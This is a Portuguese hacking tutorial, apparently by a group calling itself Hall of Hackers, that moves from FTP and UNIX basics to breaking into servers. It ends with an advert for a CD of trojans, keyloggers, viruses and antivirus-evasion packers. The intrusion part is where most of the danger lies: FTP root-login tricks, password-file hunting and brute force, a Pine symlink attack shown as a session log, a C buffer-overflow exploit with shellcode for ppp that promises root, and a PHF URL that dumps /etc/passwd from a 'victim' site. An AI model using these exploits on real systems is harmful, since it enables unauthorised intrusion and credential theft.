 Podemos visualizar e manipular arquivos de um servidor FTP dentro do windows como se o 
arquivo estivesse no nosso computador. 
 Observe a imagem, aparece as pastas no explorer, você pode copiar, colar, recortar... 
 
 
 
 Para criar a conexão: 
- Clique em Iniciar > Configurações > Painel de Controle > Conexões de Rede. 
- Em outros locais (coluna à esquerda) entre em Meus Locais de Rede 
- Depois clique em Adicionar local de Rede 
- Agora é só ir seguindo as etapas. 
- Coloque o IP ou o endereço do servidor de FTP 
 
A vantagem de usar FTP desta forma é que fica bem mais simples e intuitivo. 
Mas a grande Desvantagem é que você não terá as varias opções de comandos que existe no 
prompt, você está limitado a copiar colar. Por exemplo, se tiver algum arquivo oculto, você nem 
saberá. 
 
 
 
 
 
FTP UNIX 
 
A grande maioria dos servidores de FTP usam o Sistema Operacional UNIX. 
Vamos ver como funciona e os principais comandos de UNIX em um servidor FTP 
 
USUÁRIOS 
 
Root = super usuário ( poder realizar todas as funções sem restrição ) 
 
Cada usuário é classificado com um número, de 0 a FFFF-1 (65534). 
O numero 0 é designado para o Root e o 65534 para Ananymous 
De 0 a 100 são de superusuários (bin, adm, user, admin, guest, etc), se o servidor for pequeno o 
root e estes outros superusários são a mesma pessoa. 
 
NAVEGAÇÃO 
 
Importante em Unix os comandos são Case Sensitive ( diferencia letras maiúsculas e minúsculas 
ao contrario do MS-DOS) 
O Unix usa arvore de diretórios igual ao DOS mas a barra é invertida, ( utilize / ao invés de \ ) 
 
ls (mostras os diretórios e arquivos, o ls equivale ao DIR /W) 
 
 
ls –a (mostras arquivos ocultos) 
 
ls –la (mostras arquivos ocultos com detalhes) 
 
ls –l (mostra as permissões) 
 
exemplo: 
drw-r--r-- root root 10000 1 de abril etc 
 
 
d - directory 
r - read - so pode ver, dar download, etc... 
w - write - pode editar, gravar... 
x - execute - eh um executavel ou um script (tipo .BAT do DOS) 
 
 
 
Primeiro espaço: mostra se é um diretório ou não. 
Próximos 3 espaços:o que o proprietário pode fazer com o arquivo 
Próximos 3 espaços: são do GROUP que pertence o arquivo 
Últimos 3 espaços: são do USER (o que qualquer usuário pode fazer) 
Os últimos números são bytes ocupados. 
 
 
 
 
 
 
 
PRINCIPAIS COMANDOS 
 
cd nomedodiretorio (para mudar de diretório) 
 
cd .. (para voltar um diretório) 
 
pwd (para ver em que diretório você esta) 
 
mkdir nomedodiretorio (para criar um diretório) 
 
rm arquivo (remover um arquivo, irá pedir confirmação y ou n ) 
 
cp arquivooriginal novalocalizaçao (copiar um arquivo) 
 
 cat (mostra o conteúdo de um arquivo equivale ao type do DOS) 
 
who ( mostra quem está conectado no server, para mandar uma mensagem utilize write 
nomedouser) 
 
 get nomedoarquivo (faz download do arquivo) 
 
cc arquivo (compila um arquivo) 
gcc arquivo monedoprograma ( compila um arquivo como o cc) 
 
 
MODIFICANDO AS PERMISSÕES 
 
chmod muda as permissões, exemplo: 
 
ls -l teste.txt 
-rw-r--r-- LoKi LoKi 34 teste.txt 
 chmod g+w teste.txt ---> muda o acesso do Group para +write 
 ls -l teste.txt 
-rw-rw-r-- LoKi LoKi 34 teste.txt 
 
 chmod a-r teste.txt ---> muda o acesso de All para -read 
 ls -l teste.txt 
--w--w---- LoKi LoKi 34 teste.txt 
 
 chmod u+w teste.txt ---> muda o acesso de User para +write 
 ls -l teste.txt 
--w--w--w- LoKi LoKi 34 teste.txt 
 
resumindo: 
o - para Owner 
g - para o Grupo 
u - para todos Usuários 
 
Importante: somente o root ou o proprietário pode usar o chmod. 
 
 
Mais comandos 
chown, muda o OWNER (proprietário) de algum arquivo, isso se você for o OWNER atual. 
Use chown novodono nomedoarquivo 
chgrp, muda o grupo a que pertence o arquivo. 
Use chgrp novogrupo nomedoarquivo 
 
 
PRICIPAIS DIRETORIOS 
 
/etc/passwd 
Neste diretório estão contidos: 
Usuários, Senhas , Ids 
Abra o arquivo passwd, dependendo da sua permissão aparecera: 
 
root:*:0:1:system PRIVILEGED account:/:/bin/sh 
anonymous:*Nologin:65534:65534:anonymous NFS user:/: 
 
ou 
 
zezinhodaesquina:HS$672H:457:457:Senhor Joao:/usr/joazinho:/bin/sh 
(username:Password:id:uid:mini descrição:diretório de trabalho:'command.com') 
 
Se você conseguir abrir o arquivo passwd você verá que o anonymous não tem senha (por isso 
você pode logar anônimo com qualquer password) 
 Se você perceber algum outro user UNPASSWORDED (sem senha) e com o ID melhor que o seu, 
entre logado com ele. 
 Mas se a senha esta ai, porque não entrar com ela agora? 
 Respostas, as senhas estão criptografadas, mas adiante veremos como decriptografar. 
 
Talves quando você abra o arquivo passwd pode aparecer isto: 
 
root:*:0:1:system PRIVILEGED account:/:/bin/sh 
anonymous:*Nologin:65534:65534:anonymous NFS user:/: 
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/: 
daemon:*:1:1:system background account:/: 
bin:*:3:4:system librarian account:/bin: 
uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico 
ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh 
ftp::12:15:Anonymous FTP:/tmp:/bin/sh 
 
Observe que no lugar das senhas dos usuários aparece um asterisco “*” , isto significa que as 
senhas estão em um outro lugar. Normalmente em 
/etc/shadow, e as vezes ela esta -r (No read) para os Users normais. 
Agora é hora de trabalhar, se as senhas estão (no read) teremos que achar uma forma de vê-las. 
O senha do root aparece com um asterisco por causa do shadow mas o shadow esta “r” para 
você. Normalmente /etc/shadow está escondido como /etc/.shadow 
Diretórios que começam com ponto “.” São diretórios ocultos. 
Se o .shadow não estiver na diretório etc, você precisa procurar e o arquivo passwd pode estar 
com outro nome. 
 
/etc/shadow/etc/shadow/etc/shadow/etc/shadow 
podem conter senhas como vimos anteriormente 
 
/etc/group /etc/group /etc/group /etc/group 
 Aqui fica guardado quem pertence a cada grupo e as senhas do grupo. 
 
/usr/adm/loginlog 
Aqui ficam os Logs, horários de entradas e saídas dos usuários. 
As vazes podem estar em /usr/adm/acct/loginlog 
E as vezes nem é encontrado, alguns servidores desativam este serviço. 
 
 /usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> : 
 Aqui fica o MAIL do usuário, para você ler esse arquivo você tem de 
ser o root ou o próprio usuário. 
 
/upload ou /cache /upload ou /cache /upload ou /cache /upload ou /cache 
 Aqui ficam gravados arquivos temporários que os usuários ou mesmo o 
ROOT ia utilizar dentro do server, mas eles sao apagados a cada 24 horas ou 
a cada semana. Em muitos servers nao existe esse diretório. 
 
 /bin :/bin :/bin :/bin : 
 Neste diretório ficam os comandos do server e as shells. Cuidado. 
 
 
SENHAS E EXPLOITSSENHAS E EXPLOITSSENHAS E EXPLOITSSENHAS E EXPLOITS 
 
Login anônimo 
user: anonymous 
pass: eu@dominio 
 
Logar como root (somente em servidores com falha) 
 
quote user ftp 
quote cwd ~root 
quote pass ftp 
 
quote user ftp 
quote cwd ~sys 
quote pass ftp 
 
quote user ftp 
quote cwd ~sysop 
quote pass ftp 
 
 
 
 
Diretorio das senhas : 
(As senhas estarão criptografadas) 
/etc/passwd 
.shadow (procure este diretório oculto) 
 
 
 
 
 
 
Decriptografando uma senha 
 
Exemplo de senha criptografada: 
root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom 
Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy 
Bob:/usr/people/bbob:/bin/csh 
Para decriptografarmos precisaremos de um decripter, pesquisem sobre decrypter passwd ftp 
 
 
Quebrando uma senha de FTP 
Quando você não pode acessar o arquivo passwd.txt e não consegue a senha criptogafada, 
significa que a segurança do servidor é muito boa ou você é muito ruim =) 
Ai só usando os métodos Lamer um deles é o Brute Force. 
Brute force significa “força bruta” existem vários programas de brute force, o funcionamento é 
simples, o programa gera inúmeras combinações de senhas até achar uma que logue. Você 
também pode usar uma “Word list” (uma lista com as senhas mais comuns) junto com o Bute 
Force. Um exemplo de programa é o Brutus 
 
 
Exploits UNIX 
 
 
Exploiter sem duvida é a melhor forma de hackear um servidor, mas é muito mais complicado, é 
impossível você entender um exploiter se você não souber programar. 
Um exploit é um programa que você cria e faz ele rodar dentro do servidor exploranda falhas e te 
levando á root. 
 Eu achei um ótimo exemplo de exploit que roda via telnet, é o PINE EXPLOIT 
 
Vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode 
fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela 
de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox. 
Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para 
~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as 
identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" > 
 
/tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile. 
 
hamors (21 19:04) litterbox:~> pine 
 
catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep 
pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine 
 
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05 
.302.f5a4 
 
catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep 
pine 
 
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 
 
hamors (23 19:09) litterbox:~> pine 
 
catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 
grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine 
 
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 
 
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + 
 
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 
 
catluvr(15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse é o ultimo que vou relacionar aqui. 
Exploitation script para vunerabilidade ppp. 
 
#include #include #include 
#define BUFFER_SIZE 156 /* size of the bufer to overflow */ 
#define OFFSET -290 /* number of bytes to jump after the start of the buffer */ 
long get_esp(void) { __asm__("movl %esp,%eax\n"); } 
 
main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; 
char execshell[] = 
 
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ 
 
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ 
 
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ 
 
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ 
 
int i,j; 
 
buf = malloc(4096); 
 
/* fill start of bufer with nops */ 
 
i = BUFFER_SIZE-strlen(execshell); 
 
memset(buf, 0x90, i); ptr = buf + i; 
 
/* place exploit code into the buffer */ 
 
for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; 
 
addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; 
 
ptr = (char *)addr_ptr; *ptr = 0; 
 
setenv("HOME", buf, 1); 
 
execl("/usr/sbin/ppp", "ppp", NULL); } Agora voce tem o root. 
 
 
 
Dicas de exploits em UNIX 
Estes são exploits usando comandos básicos de Unix, eu nem chamaria de exploits mas é legal 
para começar a estudar. 
Procurar por arquivos ocultos 
find / -name ".. " -print -xdev 
find / -name ".*" -print -xdev |cat -v 
Procurar por todos os diretórios com permissão de gravar (R) 
find / -perm -0777 -type -d -ls 
 
 
Procurando arquivos setuid no filesystem 
Os arquivos setuid habilitados pode ser usado para tentar ganhar privilegio do root 
find / -user root -perm -4000 -exec ls -ldb {} \; 
find / -perm -4000 
find / -type f -perm -4000 -exec ls -l {} \; 
 
Procurar por todos os arquivos setgid no filesystem. 
find / -group root -perm -2000 -exec ls -ldb {} \; 
 
 
BUG de PHF 
Este exploit é muito antigo, muito dificio achar um servidor desatualizado. 
Basta colocar o exploit no seu navegador.Exploit: 
/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd 
ele mostrará o diretório das senhas, você coloca o exploit na frende da URL do site, exemplo: 
http://www.sitevitima.com /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd 
 
 
 
 
 
 
 
 
 
 
Principais Falhas de FTP 
 - Não existe criptografia nos dados transmitidos, textos puros, senhas podem ser capturadas 
faciomente com um sniffer. 
 - Existem servidores que deixam arquivos.ini expostos de contendo senhas de FTP, e o google 
consegue localizar estes arquivos, por exemplo: 
Digite filetype:ini ws_ftp pwd no google, você vai ver a quantidade de arquivos expostos. 
 - Tem gente que ainda deixa root sem senha 
 - Como os navegadores interagem com FTP, link de download direto, você pode invadir um 
FTP e “linkar” os arquivos para download, tipo: 
ftp://dominio/diretorios/arquivo 
Login anônimo, deixa você navegar pelo servidor e visualizar dados que podem te elevar a root 
 
 
 
 
 
 
 
 
Como vocês pedem notar isto é o básico. Não parem de estudar, e principalmente compartilhar 
informação. 
 Se quiserem entrar em contato comigo para tirar alguma dúvida: 
 
Email: 
rackerox@webexploiter.com 
 
MSN 
rackerox@hotmail.com 
 
Praga de Orkut: 
http://www.orkut.com/Profile.aspx?uid=4380671928865807152 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
CD ROOM HACKING TOOLS 
 
O Hacking Tools é um CD de softwares voltado para quem gosta de Hacking em informática. 
 
 Não é apenas mais um CD de programas de invasão, nele vc encontra suporte para Redes, Programação, 
Comunicação de dados, TCP/IP, Scans, Exploiters, etc..Também tem os trojans e keyllogers .Resumindo todos os 
tipos de programas que vc precisa para se tornar um hacker de verdade, e não apenas mais um Lamer que sabe rouba 
senha com KL e invadir por cookies =) 
 
 No CD tem uma descrição de cada tipo de programa, e cada programa vem com um "readme" sobre o seu 
funcionamento. 
 
Para comprar o CD entre no site: 
www.cdhackingtools.com 
 
Conteudo do CD: 
 
Redes/Internet 
-Emita Pacotes UDP (com opção de tamanho de Buffer) para qualquer porta 
-Programas para conexão remota ( com suporte para diferentes roteadores ) 
-Faça uma lista de todas as portas TCP e UDP abertas em seu computador. 
-Capture pacotes de IP contendo protocolos http em sua rede 
-Procure por pastas compartilhadas 
-Desligue um computador de rede local ou através da Internet. 
-Altere o seu endereço MAC 
-Capture informações de sua rede, conexões são estabelecidas, chats, etc. e monitore tudo á distancia via email. 
-Verifique o status de qualquer servidor na internet 
-Faça do seu computador um servidor de internet. 
-Capture todas as informações do tráfego de sua rede/conexão. 
-Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e também senhas protegidas por asteriscos (útil para senhas de 
wireless). 
-Deixe qualquer porta de seu computador em escuta e crie um log de texto. 
-Faça DNS Spoofing ( redirecione qualquer endereço de site para o site que você quiser) 
-Mapeie qualquer porta de seu pc para outra maquina 
-Monitore qualquer servidor http, smtp, pop3 
-Envie emails diretamente para seu pc, faça um diagnostico qualquer servidor smtp 
-Editor de cookies 
-E muito mais... são vários programas de snifers, scans, telnet, etc. 
 
 
 
Exploiters/Scans 
Um exploit, é um programa com uma porção de dados ou uma sequência de comandos que se aproveita das 
vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos 
(ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a 
fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas. 
 
Trojans Backdoors 
Um meio secreto ou não documentado de invadir um sistema de computador . 
Trojan backdoor é um programa que age como a lenda do cavalo de tróia. entrando no computador , e liberando uma 
porta para um possível invasor. 
Os trojans atuais são divididos em duas partes: o servidor e o cliente Normalmente, o servidor está oculto em algum outro 
arquivo e, no momento que esse arquivo é executado, o servidor se instala e se oculta no computador da vítima; a partir 
deste momento, o computador pode ser acessado pelo cliente, que irá enviar informações para o servidor executar certas 
operações no computador da vítima. 
Resumindo : 
Servidor é o vírus trojan que vai se instalar no pc da vítima 
Cliente é o programa que esta no seu pc 
E vc precisa de um endereço para conectar o servidor ao cliente ,este endereço é o IP 
 
 
Keyloggers 
Keylogger (que significa registrador do teclado em inglês) é um programa de computador cuja finalidade é monitorar tudo 
o que é digitado.Instalado no computador sem o conhecimento da vítima o keylogger captura dados sensíveis e os envia a 
um cracker.Neste CD existe Keyloggers que são programáveis para enviar os logs para o email de uma pessoa. 
 
Bruteforces 
(Força Bruta): técnica de intrusão de sistemas que se baseia em tentativa e erro. São geradas palavras e a combinação 
destas com em nomes de usuários e senhas é tentada exaustivamente até que um usuário válido seja 
encontrado.Ferramentas para força bruta em: 
- HTTP Basic Auth 
- HTTP Form 
- FTP 
- POP3 
- TELNET 
- SMB (Netbios) 
- Custom 
 
IP Scans 
Procure portas abertas e falhas de seguranças de um determinado IP ou uma faixa de IP específica. 
Obtenha resolução de host names, checagem de portas abertas, varredura de máquinas mortas, varreduras de múltiplas 
portas. Faça scans até de IP que não respondem ao ping. 
Procure trojans instalados em uma determinada faixa de IP. 
 
Nuckers 
Nuke é o nome atribuído a programas que finalizam 
prematuramente com uma conexão TCP através do envio 
de pacotes ICMP com mensagens de erro. Tais pacotespodem ser direcionadas para o servidor (server side nuke) 
ou para o cliente (client side nuke). 
Tais programas tem a propriedade de terminar com a 
conexão fazendo com que o cliente ou o servidor sejam 
enganados por uma mensagem de erro que normalmente 
indicaria um problema de conexão entre os dois. 
 
Binders 
Ferramenta que combina dois ou mais arquivos em um só, geralmente, com o fim de ocultar um deles. Um binder compila 
a lista selecionada em um arquivo host, que poderá ser renomeado. Arquivo host é um programa simples compilado e 
personalizado que irá descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados são 
automaticamente descompactados e executados. Quando um cavalo de Tróia está vinculado ao Notepad, por exemplo, a 
sua aparência e execução irão se assemelhar ao Notepad, mas o cavalo de Tróia também será executado 
 
Criptografia 
Programas de codificação e Decodificação de dados. 
Criptografia de arquivos em pastas, web ,dados,scripts etc. 
 
Programaçao 
O CD contem varias ferramentas de programação. 
Editores de HTML, PHP , Javascript, binary, hexadecimal. 
Ambiente de Programação em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL 
Tradutor de Algoritmos. Programas para vc desenvolver o seu software. 
Gerador de programa de instalação etc. 
 
Compiladores 
Compiladores são programas que permitem transformar códigos escrito na linguagem de programação usada em 
linguagem de máquina, gerando o binário que pode ser executado. 
No CD contem compiladores de C C++ Assesmbler Perl 
 
Resource 
Modifique, extraia e insira Resources em executáveis, você pode mudar totalmente um programa de 32 bits .Você pode 
mudar caixas de diálogo, ícones e outras coisas. 
 
 
 
Conversores 
Corverta vários formatos de arquivo. 
De bat para exe, html para exe, pps para exe, vbs para exe, áudio e vídeo para exe, swf para exe, decompilador de flash, 
conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.). 
 
Compressores 
Compressores são programas que executa partes do código ao mesmo nivel de prioridade que o sistema operacional 
permite supervisar e controlar as aplicações executadas. Excelente para que você esconda seus virus de modo que o 
antivirus não detecte. 
 
Compactadores 
São programas que usam certas técnicas para criar um arquivo, que contém vários arquivos e/ou pastas compactados.No 
cd contem os programas Winrar, Winzip e UPX 
 
Ferramentas web 
Ferramentas para você usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc . 
 
Ferramentas windows 
Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco, 
manutenção do sistema, proteção de arquivos, etc. 
 
Vírus 
Um vírus de computador nada mais é do que um programa que fica “residente” na memória do microcomputador , e de 
acordo com determinados parâmetros executa uma ação (normalmente danosa)o cd contem mais de 1000 virus, Virus 
Builders, arquivos de batch. 
 
Msn/orkut 
São mais de 70 programas para msn . 
 Sniffers para capturar conversas de msn na sua rede 
Coloque o vídeo que vc quiser na imagem da sua webcan. 
Envie qualquer arquivo que o msn bloqueia. 
Programas de flood. 
Faça um log de todas as musicas que seu amigo ouviu. 
"Roube" as imagens de exibição, emotions, etc. dos seus contatos. 
Pegue o IP de seu amigo. 
Envie uma mensagem automática quando seu amigo fechar sua janela. 
Traduza suas mensagens na janela de contato apertando a tecla F5, Transforme tudo o que você digitar em link de 
pesquisa 
E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery. 
 Mais clientes de msn alem do windows messenger. 
Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery) 
 Programas para orkut e mirc. 
 
Servidores 
Servidor é um sistema de computação que fornece serviços a uma rede de computadores tanto rede local como à internet. 
O cd contem servidore de: Email, HTTP, FTP, DNS, PHP, 
SSH e PERL. 
Hospede seu site em seu próprio computador. 
 
Clientes 
Programas que acessam os serviços de um servidor. Telnet, SSH 
 
Segurança 
Programas para ajudar na sua segurança, não um kit de anti vírus. 
Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares, 
Monitore a segurança de seu computador à distancia. 
Crie um emulador de terminal Telnet e SSH. 
 
Ferramentas gerais 
Recupere senhas, Altere ícones, resete senha do usuário, crie seus próprios auto executáveis, monitor de webcan, 
gerenciador de uploads 
 
Mais 
Navegadoes: Firefox,Netscape,Opera e Safari 
Rode o Linux dentro do windows 
Sistemas operacionais 
Programas que rodam do pen drive 
Códigos fontes do: 
Secure Internet Communication Suíte. 
Crack Whore 2.2 (Fonte do programa feito para testar a segurança dos sites.) 
GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac. 
 
 
 
 
 
EQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERS 
 A Hall of Hackers foi criada em dezembro de 2006. 
 Nosso intuito NÃO é promover nenhum tipo de prática maliciosa. 
 O “conhecimento hacker” infelizmente ainda é muito restrito e visto com preconceito, nós da Hall 
of Hackers somos inteiramente a favor da liberdade de informação. 
 Hacker não é quem fica praticando crimes virtuais. Hacker desenvolve sistemas, programas, ou 
seja, quem realmente estuda. 
 
 Nossa comunidade 
http://www.orkut.com/Community.aspx?cmm=22006772 
 
NOSSOS PROGETOS: 
 
 
 Orkut Community Hall of Hackers 
 
 
 CD Room de Softwares www.cdhackingtools.com 
 
 
 Scan On Line www.webexploiter.com 
 
 
 Blog Hacking http://insecuritynet.blogspot.com

Continue navegando